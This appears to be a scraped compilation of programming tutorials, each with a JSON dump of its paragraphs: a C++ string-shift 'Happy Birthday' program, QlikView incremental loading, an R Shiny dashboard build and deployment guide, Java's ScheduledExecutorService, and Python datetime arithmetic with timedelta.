This is a C++ program to print Happy Birthday. Begin Take a str1 which takes the next character of our desired ouput like for H it will be G. Assign the string to a pointer p. Make a while loop till *p != NULL. Go next character of the string print it and after that go the nextposition of string. Print the result. End #include<iostream> using namespace std; main(){ char str[]="G`ooxAhqsgc`x",*p; p=str; while(*p!='\0') ++*p++; cout<<str; } HappyBirthday
[ { "code": null, "e": 1109, "s": 1062, "text": "This is a C++ program to print Happy Birthday." }, { "code": null, "e": 1400, "s": 1109, "text": "Begin\n Take a str1 which takes the next character of our desired ouput like for H it will be G.\n Assign the string to a pointer p.\n Make a while loop till *p != NULL.\n Go next character of the string print it and after that go the nextposition of string.\n Print the result.\nEnd" }, { "code": null, "e": 1541, "s": 1400, "text": "#include<iostream>\nusing namespace std;\nmain(){\n char str[]=\"G`ooxAhqsgc`x\",*p;\n p=str;\n while(*p!='\\0')\n ++*p++;\n cout<<str;\n}" }, { "code": null, "e": 1555, "s": 1541, "text": "HappyBirthday" } ]
QlikView - Incremental Load
As the volume of data in the data source of a QlikView document increases, the time taken to load the file also increases which slows down the process of analysis. One approach to minimize this time taken to load data is to load only the records that are new in the source or the updated ones. This concept of loading only the new or changed records from the source into the QlikView document is called Incremental Load. To identify the new records from source, we use either a sequential unique key or a date time stamp for each row. These values of unique key or data time field has to flow from the source file to QlikView document. Let us consider the following source file containing product details in a retail store. Save this as a .csv file in the local system where it is accessible by QlikView. Over a period of time some more products are added and the description of some product changes. Product_Id,Product_Line,Product_category,Product_Subcategory 1,Sporting Goods,Outdoor Recreation,Winter Sports & Activities 2,"Food, Beverages & Tobacco",Food Items,Fruits & Vegetables 3,Apparel & Accessories,Clothing,Uniforms 4,Sporting Goods,Athletics,Rugby 5,Health & Beauty,Personal Care 6,Arts & Entertainment,Hobbies & Creative Arts,Musical Instruments 7,Arts & Entertainment,Hobbies & Creative Arts,Orchestra Accessories 8,Arts & Entertainment,Hobbies & Creative Arts,Crafting Materials 9,Hardware,Tool Accessories,Power Tool Batteries 10,Home & Garden,Bathroom Accessories,Bath Caddies 11,"Food, Beverages & Tobacco",Food Items,Frozen Vegetables 12,Home & Garden,Lawn & Garden,Power Equipment We will load the above CSV file using the script editor (Control+E) by choosing the Table Files option as shown below. Here we also save the data into a QVD file in the local system. Save the QlikView document as a .qvw file. We can check the data loaded to QlikView document by creating a sheet object called Table Box. This is available in the Layout menu and New Sheet Objects sub-menu. On selecting the Table Box sheet object, we get to the next screen, which is used to select the columns and their positions in the table to be created. We choose the following columns and their positions and click Finish. The following chart showing the data as laid out in the previous step appears. Let us add the following three more records to the source data. Here, the Product IDs are the unique numbers, which represent new records. 13,Office Supplies,Presentation Supplies,Display 14,Hardware,Tool Accessories,Jigs 15,Baby & Toddler,Diapering,Baby Wipes Now, we write the script to pull only the new records form the source. // Load the data from the stored qvd. Stored_Products: LOAD Product_Id, Product_Line, Product_category, Product_Subcategory FROM [E:\Qlikview\data\products.qvd] (qvd); //Select the maximum value of Product ID. Max_Product_ID: Load max(Product_Id) as MaxId resident Stored_Products; //Store the Maximum value of product Id in a variable. Let MaxId = peek('MaxId',-1); drop table Stored_Products; //Pull the rows that are new. NewProducts: LOAD Product_Id,Product_Line, Product_category,Product_Subcategory from [E:\Qlikview\data\product_categories.csv] (txt, codepage is 1252, embedded labels, delimiter is ',', msq) where Product_Id > $(MaxId); //Concatenate the new values with existing qvd. Concatenate LOAD Product_Id,Product_Line, Product_category, Product_Subcategory FROM [E:\Qlikview\data\products.qvd](qvd); //Store the values in qvd. store NewProducts into [E:\Qlikview\data\products.qvd](qvd); The above script fetches only the new records, which are loaded and stored into the qvd file. As we see the records with the new Product IDs 13, 14 and 15. 70 Lectures 5 hours Arthur Fong Print Add Notes Bookmark this page
[ { "code": null, "e": 3341, "s": 2920, "text": "As the volume of data in the data source of a QlikView document increases, the time taken to load the file also increases which slows down the process of analysis. One approach to minimize this time taken to load data is to load only the records that are new in the source or the updated ones. This concept of loading only the new or changed records from the source into the QlikView document is called Incremental Load." }, { "code": null, "e": 3556, "s": 3341, "text": "To identify the new records from source, we use either a sequential unique key or a date time stamp for each row. These values of unique key or data time field has to flow from the source file to QlikView document." }, { "code": null, "e": 3821, "s": 3556, "text": "Let us consider the following source file containing product details in a retail store. Save this as a .csv file in the local system where it is accessible by QlikView. Over a period of time some more products are added and the description of some product changes." }, { "code": null, "e": 4523, "s": 3821, "text": "Product_Id,Product_Line,Product_category,Product_Subcategory\n1,Sporting Goods,Outdoor Recreation,Winter Sports & Activities\n2,\"Food, Beverages & Tobacco\",Food Items,Fruits & Vegetables\n3,Apparel & Accessories,Clothing,Uniforms\n4,Sporting Goods,Athletics,Rugby\n5,Health & Beauty,Personal Care\n6,Arts & Entertainment,Hobbies & Creative Arts,Musical Instruments\n7,Arts & Entertainment,Hobbies & Creative Arts,Orchestra Accessories\n8,Arts & Entertainment,Hobbies & Creative Arts,Crafting Materials\n9,Hardware,Tool Accessories,Power Tool Batteries\n10,Home & Garden,Bathroom Accessories,Bath Caddies\n11,\"Food, Beverages & Tobacco\",Food Items,Frozen Vegetables\n12,Home & Garden,Lawn & Garden,Power Equipment\n" }, { "code": null, "e": 4749, "s": 4523, "text": "We will load the above CSV file using the script editor (Control+E) by choosing the Table Files option as shown below. Here we also save the data into a QVD file in the local system. Save the QlikView document as a .qvw file." }, { "code": null, "e": 4913, "s": 4749, "text": "We can check the data loaded to QlikView document by creating a sheet object called Table Box. This is available in the Layout menu and New Sheet Objects sub-menu." }, { "code": null, "e": 5135, "s": 4913, "text": "On selecting the Table Box sheet object, we get to the next screen, which is used to select the columns and their positions in the table to be created. We choose the following columns and their positions and click Finish." }, { "code": null, "e": 5214, "s": 5135, "text": "The following chart showing the data as laid out in the previous step appears." }, { "code": null, "e": 5353, "s": 5214, "text": "Let us add the following three more records to the source data. Here, the Product IDs are the unique numbers, which represent new records." }, { "code": null, "e": 5476, "s": 5353, "text": "13,Office Supplies,Presentation Supplies,Display\n14,Hardware,Tool Accessories,Jigs\n15,Baby & Toddler,Diapering,Baby Wipes\n" }, { "code": null, "e": 5547, "s": 5476, "text": "Now, we write the script to pull only the new records form the source." }, { "code": null, "e": 6494, "s": 5547, "text": "// Load the data from the stored qvd.\nStored_Products:\nLOAD Product_Id, \n Product_Line, \n Product_category, \n Product_Subcategory\nFROM\n[E:\\Qlikview\\data\\products.qvd]\n(qvd);\n\n//Select the maximum value of Product ID.\nMax_Product_ID:\nLoad max(Product_Id) as MaxId\nresident Stored_Products;\n\n//Store the Maximum value of product Id in a variable.\nLet MaxId = peek('MaxId',-1);\n\n\t drop table Stored_Products;\n\n\n//Pull the rows that are new.\t \nNewProducts:\nLOAD Product_Id,Product_Line, Product_category,Product_Subcategory\n\t from [E:\\Qlikview\\data\\product_categories.csv]\n\t (txt, codepage is 1252, embedded labels, delimiter is ',', msq)\n\t where Product_Id > $(MaxId);\n\t \n//Concatenate the new values with existing qvd.\nConcatenate\nLOAD Product_Id,Product_Line, Product_category, \n Product_Subcategory\nFROM [E:\\Qlikview\\data\\products.qvd](qvd);\n\n//Store the values in qvd.\nstore NewProducts into [E:\\Qlikview\\data\\products.qvd](qvd);" }, { "code": null, "e": 6650, "s": 6494, "text": "The above script fetches only the new records, which are loaded and stored into the qvd file. As we see the records with the new Product IDs 13, 14 and 15." }, { "code": null, "e": 6683, "s": 6650, "text": "\n 70 Lectures \n 5 hours \n" }, { "code": null, "e": 6696, "s": 6683, "text": " Arthur Fong" }, { "code": null, "e": 6703, "s": 6696, "text": " Print" }, { "code": null, "e": 6714, "s": 6703, "text": " Add Notes" } ]
A Complete Dashboard Project in R Shiny App | by Lasha Gochiashvili | Towards Data Science
To get a taste of what we will build in this guide you can take a look at the live dashboard: https://gesurvey.shinyapps.io/Graduate-Employment-Survey/ Now, one can ask why R and Shiny App? I would answer - because it is free, scalable, and easy to learn, supported by a generous & enthusiastic community, and it's pretty. The full codes of the dashboard project on Github. Data sourcesData transformationShiny App structureVisualizationsDeployment of the dashboard on https://www.shinyapps.io/ web server. Data sources Data transformation Shiny App structure Visualizations Deployment of the dashboard on https://www.shinyapps.io/ web server. Our motivation is that the dashboard will help young people of Singapore and those seeking study opportunities in Singapore to analyze which university & degree has a better outcome with regards to employment & income. Let’s get started! We will use two datasets in this project. Graduate employment survey dataset can be found here: data.gov.sg/ges The number of graduates by university dataset can be found here: data.gov.sg/gra As mentioned the main metrics of the analysis are: Employment Rate Monthly Gross Income We will use the following R packages: The standard workflow about data transformation looks like this: In the codes provided on GitHub (DataWrangling.R), we will basically attach dataset, clean NAs, fill missing values, change university names to make it more intuitive, and finally, we will save the data frames in .rds format which is much faster to read at the next steps. If you see the names of the school unique(data_e$school) in the dataset there are some names that need cleaning, for example: Transforming factor variables into numeric: data_e <- data_e %>% modify_at(c(5:12), as.numeric) And finally, saving cleaned data frame as .rds extension for Shiny: saveRDS(data_e, file = “data/employment_data.rds”) To run a Shiny App you need to install the package & import the library: install.packages("Shiny")library(Shiny) Shiny applications have two important components, I call them front-end ui.R and back-end server.R. In ui.R we create a structure of front-end, how we want our web application to look like. This is the basic diagram of the ui for our dashboard: Now, let’s run the first example of ui.R and its corresponding server.R codes. We have front-ent, now we need the corresponding back-end. If you look at lines 21 and 21 we have table output “datahead” and plot output “piePlot”. Let’s configure the server.R. After running the ui.R or server.R code the result is below: The full codes are on GitHub for ui.R and server.R. You will need to have ui.R and server.R in the same folder in separate R files. When you run one of the R files the Shiny App will open. Visualizations are mostly done in Plotly and the data tables are presented in Kable. I recommend checking some examples on the internet because they are so fancy! Here are useful links for Plotly interactive graphs and Kable awesome tables. From the project, I will post here some examples. Plotly Let’s dive deeper into the details of the National University of Singapore and list the basic monthly median income for each school. Code example: Result: And we can see from the plot that graduates from the College of Law earn the most :). Kable To show the pretty and interactive table of Kable, Let’s see the full table of Fulltime Employment and Balance Monthly Salary (Median) by Universities, their Schools, and Degrees in 2018. Code example: And the results: To publish your Shiny App online, you should sign up on www.shinyapps.io, it is free to run three applications. Please read this guide as it explains in detail what you need to do to create a connection between your app and shinyapps.io server. Few steps are here: 0. I assume you have ui.R and server.R in the same folder. Run code in your R file: Run code in your R file: install.packages('rsconnect')library(rsconnect) 2. Create a shinyapps.io account. Please note that shinyapps.io will use your account name as the domain name for all your apps. 3. When you log in to shinyapps.io, get the token that is generated on the website: 4. Configure rsconnect package to use your account. Citing the website: “Click the show button on the token page. A window will pop up that shows the full command to configure your account using the appropriate parameters for the rsconnect::setAccountInfo function. Copy this command to your clipboard, and then paste it into the command line of RStudio and click enter.” 5. Publish your app. To deploy your application, use the below codes: library(rsconnect)deployApp() Then click the Publish button in R (from ui.R or server.R). Once the deployment finishes voalaaaa!!! Congratulations! Your first Shiny App is published. If you make changes in ui.R or server.R files you can republish the app. In this step-by-step guide, I showed you how to build this web dashboard in a Shiny App: https://gesurvey.shinyapps.io/Graduate-Employment-Survey/. We reviewed Data sources, Data transformation, Shiny App structure, Visualizations used in the project, and deployment steps. Feel free to access and use the codes. Downloading and running them should give you the same results. Full codes are here. If you run into issues feel free to drop me a message ;) Special thanks to Dr. Piotr Wójcik and Mgr. Piotr Ćwiakowski — our teachers in Advanced R at the University of Warsaw. And to my colleague Zimin Luo with whom I was working on this project during Graduate Studies in Data Science at the University of Warsaw.
[ { "code": null, "e": 324, "s": 172, "text": "To get a taste of what we will build in this guide you can take a look at the live dashboard: https://gesurvey.shinyapps.io/Graduate-Employment-Survey/" }, { "code": null, "e": 495, "s": 324, "text": "Now, one can ask why R and Shiny App? I would answer - because it is free, scalable, and easy to learn, supported by a generous & enthusiastic community, and it's pretty." }, { "code": null, "e": 546, "s": 495, "text": "The full codes of the dashboard project on Github." }, { "code": null, "e": 679, "s": 546, "text": "Data sourcesData transformationShiny App structureVisualizationsDeployment of the dashboard on https://www.shinyapps.io/ web server." }, { "code": null, "e": 692, "s": 679, "text": "Data sources" }, { "code": null, "e": 712, "s": 692, "text": "Data transformation" }, { "code": null, "e": 732, "s": 712, "text": "Shiny App structure" }, { "code": null, "e": 747, "s": 732, "text": "Visualizations" }, { "code": null, "e": 816, "s": 747, "text": "Deployment of the dashboard on https://www.shinyapps.io/ web server." }, { "code": null, "e": 1035, "s": 816, "text": "Our motivation is that the dashboard will help young people of Singapore and those seeking study opportunities in Singapore to analyze which university & degree has a better outcome with regards to employment & income." }, { "code": null, "e": 1054, "s": 1035, "text": "Let’s get started!" }, { "code": null, "e": 1096, "s": 1054, "text": "We will use two datasets in this project." }, { "code": null, "e": 1166, "s": 1096, "text": "Graduate employment survey dataset can be found here: data.gov.sg/ges" }, { "code": null, "e": 1247, "s": 1166, "text": "The number of graduates by university dataset can be found here: data.gov.sg/gra" }, { "code": null, "e": 1298, "s": 1247, "text": "As mentioned the main metrics of the analysis are:" }, { "code": null, "e": 1314, "s": 1298, "text": "Employment Rate" }, { "code": null, "e": 1335, "s": 1314, "text": "Monthly Gross Income" }, { "code": null, "e": 1373, "s": 1335, "text": "We will use the following R packages:" }, { "code": null, "e": 1438, "s": 1373, "text": "The standard workflow about data transformation looks like this:" }, { "code": null, "e": 1711, "s": 1438, "text": "In the codes provided on GitHub (DataWrangling.R), we will basically attach dataset, clean NAs, fill missing values, change university names to make it more intuitive, and finally, we will save the data frames in .rds format which is much faster to read at the next steps." }, { "code": null, "e": 1837, "s": 1711, "text": "If you see the names of the school unique(data_e$school) in the dataset there are some names that need cleaning, for example:" }, { "code": null, "e": 1881, "s": 1837, "text": "Transforming factor variables into numeric:" }, { "code": null, "e": 1933, "s": 1881, "text": "data_e <- data_e %>% modify_at(c(5:12), as.numeric)" }, { "code": null, "e": 2001, "s": 1933, "text": "And finally, saving cleaned data frame as .rds extension for Shiny:" }, { "code": null, "e": 2052, "s": 2001, "text": "saveRDS(data_e, file = “data/employment_data.rds”)" }, { "code": null, "e": 2125, "s": 2052, "text": "To run a Shiny App you need to install the package & import the library:" }, { "code": null, "e": 2165, "s": 2125, "text": "install.packages(\"Shiny\")library(Shiny)" }, { "code": null, "e": 2265, "s": 2165, "text": "Shiny applications have two important components, I call them front-end ui.R and back-end server.R." }, { "code": null, "e": 2355, "s": 2265, "text": "In ui.R we create a structure of front-end, how we want our web application to look like." }, { "code": null, "e": 2410, "s": 2355, "text": "This is the basic diagram of the ui for our dashboard:" }, { "code": null, "e": 2489, "s": 2410, "text": "Now, let’s run the first example of ui.R and its corresponding server.R codes." }, { "code": null, "e": 2668, "s": 2489, "text": "We have front-ent, now we need the corresponding back-end. If you look at lines 21 and 21 we have table output “datahead” and plot output “piePlot”. Let’s configure the server.R." }, { "code": null, "e": 2729, "s": 2668, "text": "After running the ui.R or server.R code the result is below:" }, { "code": null, "e": 2918, "s": 2729, "text": "The full codes are on GitHub for ui.R and server.R. You will need to have ui.R and server.R in the same folder in separate R files. When you run one of the R files the Shiny App will open." }, { "code": null, "e": 3159, "s": 2918, "text": "Visualizations are mostly done in Plotly and the data tables are presented in Kable. I recommend checking some examples on the internet because they are so fancy! Here are useful links for Plotly interactive graphs and Kable awesome tables." }, { "code": null, "e": 3209, "s": 3159, "text": "From the project, I will post here some examples." }, { "code": null, "e": 3216, "s": 3209, "text": "Plotly" }, { "code": null, "e": 3363, "s": 3216, "text": "Let’s dive deeper into the details of the National University of Singapore and list the basic monthly median income for each school. Code example:" }, { "code": null, "e": 3371, "s": 3363, "text": "Result:" }, { "code": null, "e": 3457, "s": 3371, "text": "And we can see from the plot that graduates from the College of Law earn the most :)." }, { "code": null, "e": 3463, "s": 3457, "text": "Kable" }, { "code": null, "e": 3665, "s": 3463, "text": "To show the pretty and interactive table of Kable, Let’s see the full table of Fulltime Employment and Balance Monthly Salary (Median) by Universities, their Schools, and Degrees in 2018. Code example:" }, { "code": null, "e": 3682, "s": 3665, "text": "And the results:" }, { "code": null, "e": 3794, "s": 3682, "text": "To publish your Shiny App online, you should sign up on www.shinyapps.io, it is free to run three applications." }, { "code": null, "e": 3927, "s": 3794, "text": "Please read this guide as it explains in detail what you need to do to create a connection between your app and shinyapps.io server." }, { "code": null, "e": 3947, "s": 3927, "text": "Few steps are here:" }, { "code": null, "e": 4006, "s": 3947, "text": "0. I assume you have ui.R and server.R in the same folder." }, { "code": null, "e": 4031, "s": 4006, "text": "Run code in your R file:" }, { "code": null, "e": 4056, "s": 4031, "text": "Run code in your R file:" }, { "code": null, "e": 4104, "s": 4056, "text": "install.packages('rsconnect')library(rsconnect)" }, { "code": null, "e": 4233, "s": 4104, "text": "2. Create a shinyapps.io account. Please note that shinyapps.io will use your account name as the domain name for all your apps." }, { "code": null, "e": 4317, "s": 4233, "text": "3. When you log in to shinyapps.io, get the token that is generated on the website:" }, { "code": null, "e": 4689, "s": 4317, "text": "4. Configure rsconnect package to use your account. Citing the website: “Click the show button on the token page. A window will pop up that shows the full command to configure your account using the appropriate parameters for the rsconnect::setAccountInfo function. Copy this command to your clipboard, and then paste it into the command line of RStudio and click enter.”" }, { "code": null, "e": 4759, "s": 4689, "text": "5. Publish your app. To deploy your application, use the below codes:" }, { "code": null, "e": 4789, "s": 4759, "text": "library(rsconnect)deployApp()" }, { "code": null, "e": 4849, "s": 4789, "text": "Then click the Publish button in R (from ui.R or server.R)." }, { "code": null, "e": 5015, "s": 4849, "text": "Once the deployment finishes voalaaaa!!! Congratulations! Your first Shiny App is published. If you make changes in ui.R or server.R files you can republish the app." }, { "code": null, "e": 5469, "s": 5015, "text": "In this step-by-step guide, I showed you how to build this web dashboard in a Shiny App: https://gesurvey.shinyapps.io/Graduate-Employment-Survey/. We reviewed Data sources, Data transformation, Shiny App structure, Visualizations used in the project, and deployment steps. Feel free to access and use the codes. Downloading and running them should give you the same results. Full codes are here. If you run into issues feel free to drop me a message ;)" } ]
ScheduledExecutorService Interface
A java.util.concurrent.ScheduledExecutorService interface is a subinterface of ExecutorService interface, and supports future and/or periodic execution of tasks. <V> ScheduledFuture<V> schedule(Callable<V> callable, long delay, TimeUnit unit) Creates and executes a ScheduledFuture that becomes enabled after the given delay. ScheduledFuture<?> schedule(Runnable command, long delay, TimeUnit unit) Creates and executes a one-shot action that becomes enabled after the given delay. ScheduledFuture<?> scheduleAtFixedRate(Runnable command, long initialDelay, long period, TimeUnit unit) Creates and executes a periodic action that becomes enabled first after the given initial delay, and subsequently with the given period; that is executions will commence after initialDelay then initialDelay+period, then initialDelay + 2 * period, and so on. ScheduledFuture<?> scheduleWithFixedDelay(Runnable command, long initialDelay, long delay, TimeUnit unit) Creates and executes a periodic action that becomes enabled first after the given initial delay, and subsequently with the given delay between the termination of one execution and the commencement of the next. The following TestThread program shows usage of ScheduledExecutorService interface in thread based environment. import java.util.concurrent.Executors; import java.util.concurrent.ScheduledExecutorService; import java.util.concurrent.ScheduledFuture; import java.util.concurrent.TimeUnit; public class TestThread { public static void main(final String[] arguments) throws InterruptedException { final ScheduledExecutorService scheduler = Executors.newScheduledThreadPool(1); final ScheduledFuture<?> beepHandler = scheduler.scheduleAtFixedRate(new BeepTask(), 2, 2, TimeUnit.SECONDS); scheduler.schedule(new Runnable() { @Override public void run() { beepHandler.cancel(true); scheduler.shutdown(); } }, 10, TimeUnit.SECONDS); } static class BeepTask implements Runnable { public void run() { System.out.println("beep"); } } } This will produce the following result. beep beep beep beep 16 Lectures 2 hours Malhar Lathkar 19 Lectures 5 hours Malhar Lathkar 25 Lectures 2.5 hours Anadi Sharma 126 Lectures 7 hours Tushar Kale 119 Lectures 17.5 hours Monica Mittal 76 Lectures 7 hours Arnab Chakraborty Print Add Notes Bookmark this page
[ { "code": null, "e": 2819, "s": 2657, "text": "A java.util.concurrent.ScheduledExecutorService interface is a subinterface of ExecutorService interface, and supports future and/or periodic execution of tasks." }, { "code": null, "e": 2900, "s": 2819, "text": "<V> ScheduledFuture<V> schedule(Callable<V> callable, long delay, TimeUnit unit)" }, { "code": null, "e": 2983, "s": 2900, "text": "Creates and executes a ScheduledFuture that becomes enabled after the given delay." }, { "code": null, "e": 3056, "s": 2983, "text": "ScheduledFuture<?> schedule(Runnable command, long delay, TimeUnit unit)" }, { "code": null, "e": 3139, "s": 3056, "text": "Creates and executes a one-shot action that becomes enabled after the given delay." }, { "code": null, "e": 3243, "s": 3139, "text": "ScheduledFuture<?> scheduleAtFixedRate(Runnable command, long initialDelay, long period, TimeUnit unit)" }, { "code": null, "e": 3501, "s": 3243, "text": "Creates and executes a periodic action that becomes enabled first after the given initial delay, and subsequently with the given period; that is executions will commence after initialDelay then initialDelay+period, then initialDelay + 2 * period, and so on." }, { "code": null, "e": 3607, "s": 3501, "text": "ScheduledFuture<?> scheduleWithFixedDelay(Runnable command, long initialDelay, long delay, TimeUnit unit)" }, { "code": null, "e": 3817, "s": 3607, "text": "Creates and executes a periodic action that becomes enabled first after the given initial delay, and subsequently with the given delay between the termination of one execution and the commencement of the next." }, { "code": null, "e": 3929, "s": 3817, "text": "The following TestThread program shows usage of ScheduledExecutorService interface in thread based environment." }, { "code": null, "e": 4783, "s": 3929, "text": "import java.util.concurrent.Executors;\nimport java.util.concurrent.ScheduledExecutorService;\nimport java.util.concurrent.ScheduledFuture;\nimport java.util.concurrent.TimeUnit;\n\npublic class TestThread {\n\n public static void main(final String[] arguments) throws InterruptedException {\n final ScheduledExecutorService scheduler = Executors.newScheduledThreadPool(1);\n\n final ScheduledFuture<?> beepHandler = \n scheduler.scheduleAtFixedRate(new BeepTask(), 2, 2, TimeUnit.SECONDS);\n\n scheduler.schedule(new Runnable() {\n\n @Override\n public void run() {\n beepHandler.cancel(true);\n scheduler.shutdown();\t\t\t\n }\n }, 10, TimeUnit.SECONDS);\n }\n\n static class BeepTask implements Runnable {\n \n public void run() {\n System.out.println(\"beep\"); \n }\n }\n}" }, { "code": null, "e": 4823, "s": 4783, "text": "This will produce the following result." }, { "code": null, "e": 4844, "s": 4823, "text": "beep\nbeep\nbeep\nbeep\n" }, { "code": null, "e": 4877, "s": 4844, "text": "\n 16 Lectures \n 2 hours \n" }, { "code": null, "e": 4893, "s": 4877, "text": " Malhar Lathkar" }, { "code": null, "e": 4926, "s": 4893, "text": "\n 19 Lectures \n 5 hours \n" }, { "code": null, "e": 4942, "s": 4926, "text": " Malhar Lathkar" }, { "code": null, "e": 4977, "s": 4942, "text": "\n 25 Lectures \n 2.5 hours \n" }, { "code": null, "e": 4991, "s": 4977, "text": " Anadi Sharma" }, { "code": null, "e": 5025, "s": 4991, "text": "\n 126 Lectures \n 7 hours \n" }, { "code": null, "e": 5039, "s": 5025, "text": " Tushar Kale" }, { "code": null, "e": 5076, "s": 5039, "text": "\n 119 Lectures \n 17.5 hours \n" }, { "code": null, "e": 5091, "s": 5076, "text": " Monica Mittal" }, { "code": null, "e": 5124, "s": 5091, "text": "\n 76 Lectures \n 7 hours \n" }, { "code": null, "e": 5143, "s": 5124, "text": " Arnab Chakraborty" }, { "code": null, "e": 5150, "s": 5143, "text": " Print" }, { "code": null, "e": 5161, "s": 5150, "text": " Add Notes" } ]
How to add and subtract days using DateTime in Python? - GeeksforGeeks
23 Apr, 2021 As we know date and time are used in programs where we have to keep track of date and time, so it is necessary to have a module to manipulate date and time. In python, a Date Time module deals with dates and times. Date time module is built into Python standard library. Datetime module consists of the following classes: Name Description For adding or subtracting date, we use something called timedelta() function which can be found under datetime class. It is used to manipulate date, and we can perform an arithmetic operations on date like adding or subtract. timedelta is very easy and useful to implement. Syntax: class datetime.timedelta(days=10, seconds=40, microseconds=10, milliseconds=60, minutes=10, hours=4, weeks=8) Returns : Date Note : if we doesn’t specify by default it takes integer as an day. Example 1. Adding Days Python3 # MANIPULATING DATETIMEfrom datetime import date, timedelta today_date = date.today() print("CURRENT DAY : ", today_date) # as said earlier it takes argument as day by defaulttd = timedelta(5)print("AFTER 5 DAYS DATE WILL BE : ", today_date + td) Output: CURRENT DAY : 2020-12-27 AFTER 5 DAYS DATE WILL BE : 2021-01-01 Example 2. Subtract Days Python3 # MANIPULATING DATETIMEfrom datetime import date, timedelta current_date = date.today() print("CURRENT DAY : ",current_date) print("OLD Date : ",current_date - timedelta(17)) Output: CURRENT DAY : 2020-12-27 OLD Date : 2020-12-10 As in the above code, I have created a variable called current_date which holds the current date, and then prints that current date. After that, I have used timedelta function and in the parameter, We have passed a value that how many days want to add or subtract (This value can be any integer). Similarly, we can do the same with time also. Example 3: Python3 # Manipulate DATETIMEfrom datetime import datetime, timedeltacurrent = datetime.now()print("This is the current date and time :- ", current) # FOR PRINTING TOMORROW'S DATEtomorrow = timedelta(1)print("Tomorrow's date and time :- ", current + tomorrow) # FOR PRINTING YESTERDAY'S DATEyesterday = timedelta(-1)print("Yesterday's date and time :- ", current + yesterday) Output: This is the current date and time :- 2020-12-27 13:50:14.229336 Tomorrow's date and time :- 2020-12-28 13:50:14.229336 Yesterday's date and time :- 2020-12-26 13:50:14.229336 Example 4: Python3 # MANIPULATING DATETIMEfrom datetime import datetime, timedelta curr = datetime.now()print("Current Date and time :- ", curr) new_datetime = timedelta(days = 10, seconds = 40, microseconds = 10, milliseconds = 60, minutes = 10, hours = 4, weeks = 8) print("New Date and time :- ", curr + new_datetime) Output: Current Date and time :- 2020-12-27 13:58:42.178211 New Date and time :- 2021-03-03 18:09:22.238221 sk9209767 simmytarika5 Picked Python datetime-program Python-datetime Python Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here. Comments Old Comments Create a Pandas DataFrame from Lists Box Plot in Python using Matplotlib Python Dictionary Bar Plot in Matplotlib Enumerate() in Python Python | Get dictionary keys as a list Python | Convert set into a list Ways to filter Pandas DataFrame by column values Graph Plotting in Python | Set 1 Python - Call function from another file
[ { "code": null, "e": 24541, "s": 24513, "text": "\n23 Apr, 2021" }, { "code": null, "e": 24812, "s": 24541, "text": "As we know date and time are used in programs where we have to keep track of date and time, so it is necessary to have a module to manipulate date and time. In python, a Date Time module deals with dates and times. Date time module is built into Python standard library." }, { "code": null, "e": 24863, "s": 24812, "text": "Datetime module consists of the following classes:" }, { "code": null, "e": 24868, "s": 24863, "text": "Name" }, { "code": null, "e": 24880, "s": 24868, "text": "Description" }, { "code": null, "e": 25155, "s": 24880, "text": "For adding or subtracting date, we use something called timedelta() function which can be found under datetime class. It is used to manipulate date, and we can perform an arithmetic operations on date like adding or subtract. timedelta is very easy and useful to implement." }, { "code": null, "e": 25273, "s": 25155, "text": "Syntax: class datetime.timedelta(days=10, seconds=40, microseconds=10, milliseconds=60, minutes=10, hours=4, weeks=8)" }, { "code": null, "e": 25288, "s": 25273, "text": "Returns : Date" }, { "code": null, "e": 25357, "s": 25288, "text": "Note : if we doesn’t specify by default it takes integer as an day. " }, { "code": null, "e": 25381, "s": 25357, "text": "Example 1. Adding Days " }, { "code": null, "e": 25389, "s": 25381, "text": "Python3" }, { "code": "# MANIPULATING DATETIMEfrom datetime import date, timedelta today_date = date.today() print(\"CURRENT DAY : \", today_date) # as said earlier it takes argument as day by defaulttd = timedelta(5)print(\"AFTER 5 DAYS DATE WILL BE : \", today_date + td)", "e": 25636, "s": 25389, "text": null }, { "code": null, "e": 25647, "s": 25636, "text": " Output: " }, { "code": null, "e": 25713, "s": 25647, "text": "CURRENT DAY : 2020-12-27\nAFTER 5 DAYS DATE WILL BE : 2021-01-01" }, { "code": null, "e": 25739, "s": 25713, "text": "Example 2. Subtract Days " }, { "code": null, "e": 25747, "s": 25739, "text": "Python3" }, { "code": "# MANIPULATING DATETIMEfrom datetime import date, timedelta current_date = date.today() print(\"CURRENT DAY : \",current_date) print(\"OLD Date : \",current_date - timedelta(17))", "e": 25922, "s": 25747, "text": null }, { "code": null, "e": 25932, "s": 25922, "text": " Output: " }, { "code": null, "e": 25981, "s": 25932, "text": "CURRENT DAY : 2020-12-27\nOLD Date : 2020-12-10" }, { "code": null, "e": 26114, "s": 25981, "text": "As in the above code, I have created a variable called current_date which holds the current date, and then prints that current date." }, { "code": null, "e": 26278, "s": 26114, "text": "After that, I have used timedelta function and in the parameter, We have passed a value that how many days want to add or subtract (This value can be any integer)." }, { "code": null, "e": 26327, "s": 26278, "text": "Similarly, we can do the same with time also. " }, { "code": null, "e": 26339, "s": 26327, "text": "Example 3: " }, { "code": null, "e": 26347, "s": 26339, "text": "Python3" }, { "code": "# Manipulate DATETIMEfrom datetime import datetime, timedeltacurrent = datetime.now()print(\"This is the current date and time :- \", current) # FOR PRINTING TOMORROW'S DATEtomorrow = timedelta(1)print(\"Tomorrow's date and time :- \", current + tomorrow) # FOR PRINTING YESTERDAY'S DATEyesterday = timedelta(-1)print(\"Yesterday's date and time :- \", current + yesterday)", "e": 26715, "s": 26347, "text": null }, { "code": null, "e": 26726, "s": 26715, "text": " Output: " }, { "code": null, "e": 26904, "s": 26726, "text": "This is the current date and time :- 2020-12-27 13:50:14.229336\nTomorrow's date and time :- 2020-12-28 13:50:14.229336\nYesterday's date and time :- 2020-12-26 13:50:14.229336" }, { "code": null, "e": 26916, "s": 26904, "text": "Example 4: " }, { "code": null, "e": 26924, "s": 26916, "text": "Python3" }, { "code": "# MANIPULATING DATETIMEfrom datetime import datetime, timedelta curr = datetime.now()print(\"Current Date and time :- \", curr) new_datetime = timedelta(days = 10, seconds = 40, microseconds = 10, milliseconds = 60, minutes = 10, hours = 4, weeks = 8) print(\"New Date and time :- \", curr + new_datetime)", "e": 27322, "s": 26924, "text": null }, { "code": null, "e": 27331, "s": 27322, "text": "Output: " }, { "code": null, "e": 27433, "s": 27331, "text": "Current Date and time :- 2020-12-27 13:58:42.178211\nNew Date and time :- 2021-03-03 18:09:22.238221" }, { "code": null, "e": 27443, "s": 27433, "text": "sk9209767" }, { "code": null, "e": 27456, "s": 27443, "text": "simmytarika5" }, { "code": null, "e": 27463, "s": 27456, "text": "Picked" }, { "code": null, "e": 27487, "s": 27463, "text": "Python 